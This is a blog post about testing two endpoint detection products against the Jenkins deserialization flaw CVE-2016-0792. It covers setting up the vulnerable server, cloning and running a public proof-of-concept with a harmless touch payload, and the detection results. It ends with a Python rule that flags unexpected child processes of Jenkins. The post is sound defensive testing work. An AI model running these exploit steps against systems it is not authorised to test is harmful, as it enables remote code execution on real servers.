Testing Endpoint Detection Response Products
This is the first of many posts on how to test your Endpoint Detection Response product by using real world scenarios.
Products that are being tested
I am testing two products today:
- Palo Alto Prisma Cloud Host Defender (Twistlock’s Endpoint Detection Response product)
- Palo Alto XDR Agent for Linux
Jenkins Exploit Information (CVE-2016-0792)
CVE-2016-0792 refers to a vulnerability in Jenkins (a continuous integration tool) before version 1.650 and LTS before 1.642.2 that allows remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
Setting up your Environment
I will be covering a two machine scenario (victim and attacker). The victim machine will have the vulnerable version of Jenkins and the attacker machine will be running the exploit.
Victim Machine Setup
```shell
# Environment Setup for CVE-2016-0792
#
# Multiple unspecified API endpoints in Jenkins
# before 1.650 and LTS before 1.642.2 allow remote authenticated users to
# execute arbitrary code via serialized data in an XML file,
# related to XStream and groovy.util.Expando.
#
# O/S: Ubuntu 18.04
# Jenkins Version 1.609.3 (known to be exploitable)
#
# Run on the host (vulnerable machine)

# Prerequisite packages
# Download Java 7 JDK
curl -L -O -k https://files-cdn.liferay.com/mirrors/download.oracle.com/otn-pub/java/jdk/7u80-b15/jdk-7u80-linux-x64.rpm

# Convert rpm to deb
apt-get install alien netcat developer-tools
sudo alien --scripts jdk-7u80-linux-x64.rpm

# Install Java 7 deb
dpkg -i jdk_1.7.080-1_amd64.deb

# Create Jenkins user
useradd jenkins
mkdir /home/jenkins
mkdir /opt/jenkins
chown -R jenkins:jenkins /home/jenkins
mkhomedir_helper jenkins

# Download and run Jenkins
cd /opt/jenkins
curl -L -k -O https://get.jenkins.io/war-stable/1.609.3/jenkins.war
java -jar jenkins.war
```
Attacker Machine Setup
I am using macOS Monterey, but any machine with Python 3 will work.
The proof-of-concept code was found on GitHub and was written by jpiechowka.
```shell
pip3 install requests
git clone https://github.com/jpiechowka/jenkins-cve-2016-0792
cd jenkins-cve-2016-0792
```
You will need to replace <serverip> with the IP address of the server you are trying to exploit.
This example touches a file located at /tmp/file_write. The exploit proof-of-concept code has an issue with special characters, so my example will not use them. The command below (touch) works fine and proves that we have code execution.
```python
python3
>>> from exploit import exploit
>>> exploit('http://<serverip>:8080/', '/usr/bin/touch /tmp/file_write')
```
Each product tested was configured with the highest possible settings for detection.
Response Testing Results
Prisma Cloud Host Defender
Did not detect or alert
Palo Alto XDR Linux Host Agent
Detected a “Suspicious Input Deserialization” event
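The behavioural signal this test leaves on the host is a Jenkins JVM spawning a process it would never spawn in a normal build (here, /usr/bin/touch writing to /tmp). The script below is an added example for this post, not code from either vendor's product or from the exploit repository: it runs a simple parent/child lineage check over process-creation events and flags unexpected children of the `java -jar jenkins.war` process. The JSON-lines event format, the sample events, and the list of benign build commands are all constructed assumptions for illustration, not any EDR's real telemetry.

```python
"""Flag unexpected child processes of the Jenkins JVM in process-creation events.

Added example for this post (not vendor or exploit code).  The event format is
a constructed JSON-lines layout; real EDR telemetry will differ in field names.
"""
import json

# Constructed sample telemetry: one process-creation event per line.  PID 1200
# is the Jenkins master started by the setup script (as root, since the script
# never switches to the jenkins user); 1215 is what the touch test looks like.
SAMPLE_EVENTS = """\
{"pid": 1200, "ppid": 1, "user": "root", "cmd": "java -jar jenkins.war", "cwd": "/opt/jenkins"}
{"pid": 1210, "ppid": 1200, "user": "root", "cmd": "git fetch origin", "cwd": "/opt/jenkins/workspace/build"}
{"pid": 1215, "ppid": 1200, "user": "root", "cmd": "/usr/bin/touch /tmp/file_write", "cwd": "/opt/jenkins"}
{"pid": 1220, "ppid": 1, "user": "ubuntu", "cmd": "/usr/bin/touch /tmp/notes", "cwd": "/home/ubuntu"}
{"pid": 1230, "ppid": 1200, "user": "root", "cmd": "/bin/sh -c id", "cwd": "/opt/jenkins"}
"""

# Commands a Jenkins master legitimately spawns during builds.  This list is an
# assumption for the example; tune it to the jobs configured on the real host.
BENIGN_CHILD_PREFIXES = ("git ", "/usr/bin/git ", "mvn ", "gradle ")


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def jenkins_pids(events):
    """PIDs whose command line is the Jenkins WAR being run by a JVM."""
    return {e["pid"] for e in events
            if e["cmd"].startswith("java") and "jenkins.war" in e["cmd"]}


def suspicious_children(events):
    """Return events for children of the Jenkins JVM that are not expected
    build tools.  Deserialization exploits that end in code execution show up
    here as the JVM spawning a shell or utility it has no business running."""
    parents = jenkins_pids(events)
    findings = []
    for e in events:
        if e["ppid"] not in parents:
            continue  # not spawned by Jenkins; out of scope for this rule
        if e["cmd"].startswith(BENIGN_CHILD_PREFIXES):
            continue  # allow-listed build tooling
        findings.append(e)
    return findings


def summarize(events):
    """One alert line per finding, including the parent's command line and
    the user the child runs as (root here, because Jenkins runs as root)."""
    by_pid = {e["pid"]: e for e in events}
    return [
        f"pid {e['pid']} ({e['cmd']}) spawned by pid {e['ppid']} "
        f"({by_pid[e['ppid']]['cmd']}) as {e['user']}"
        for e in suspicious_children(events)
    ]


if __name__ == "__main__":
    for line in summarize(parse_events(SAMPLE_EVENTS)):
        print("ALERT:", line)
```

Run against the constructed sample, the rule flags the touch from the test and the shell child, while ignoring the git child of Jenkins and the unrelated touch run by a regular user. Two points worth carrying into a real assessment: first, check that the artifact (/tmp/file_write) actually appeared before scoring a product as a miss, so a failed exploit is not mistaken for a detection gap; second, the setup script starts Jenkins as root after creating the jenkins user, so anything the exploit runs executes as root, which is exactly the lineage the summary line makes visible.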